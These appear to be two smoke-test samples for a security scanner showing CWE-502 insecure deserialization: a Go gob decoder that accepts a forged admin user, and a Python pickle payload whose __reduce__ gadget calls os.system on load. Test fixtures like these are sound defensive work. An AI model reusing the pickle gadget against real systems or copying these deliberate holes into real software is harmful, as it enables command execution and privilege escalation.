File: smoke_tests/go/insecure_deserialization.go
package main

import (
	"bytes"
	"encoding/gob"
	"fmt"
)

type User struct {
	Username string
	IsAdmin  bool
}

// --- VULNERABLE CODE ---
// Deserializing data from an untrusted source. An attacker could manipulate
// the serialized data to create an admin user.
// CWE-502: Deserialization of Untrusted Data
func deserializeUser(data []byte) (*User, error) {
	var user User
	decoder := gob.NewDecoder(bytes.NewReader(data))
	err := decoder.Decode(&user)
	if err != nil {
		return nil, err
	}
	return &user, nil
}
// -----------------------

func main() {
	// Attacker creates a payload for an admin user
	var buf bytes.Buffer
	encoder := gob.NewEncoder(&buf)
	adminUser := User{Username: "attacker", IsAdmin: true}
	encoder.Encode(adminUser)
	maliciousData := buf.Bytes()

	// The application deserializes it
	user, err := deserializeUser(maliciousData)
	if err != nil {
		panic(err)
	}

	fmt.Printf("Deserialized user: %+v\n", user)
	if user.IsAdmin {
		fmt.Println("User is an admin! Potential privilege escalation.")
	}
}

File: smoke_tests/python/insecure_deserialization.py
import pickle
import base64
import os

# Simulate receiving a serialized object from an untrusted source
# This could be from a network request, a file, etc.
class Exploit:
    def __reduce__(self):
        return (os.system, ('echo "pwned by insecure deserialization"',))

# Malicious payload
malicious_payload = pickle.dumps(Exploit())
encoded_payload = base64.b64encode(malicious_payload)

# --- VULNERABLE CODE ---
# An attacker provides the `encoded_payload`
data_from_user = base64.b64decode(encoded_payload)
deserialized_object = pickle.loads(data_from_user) # CWE-502: Deserialization of Untrusted Data
# -----------------------

print(f"Deserialized object: {deserialized_object}")
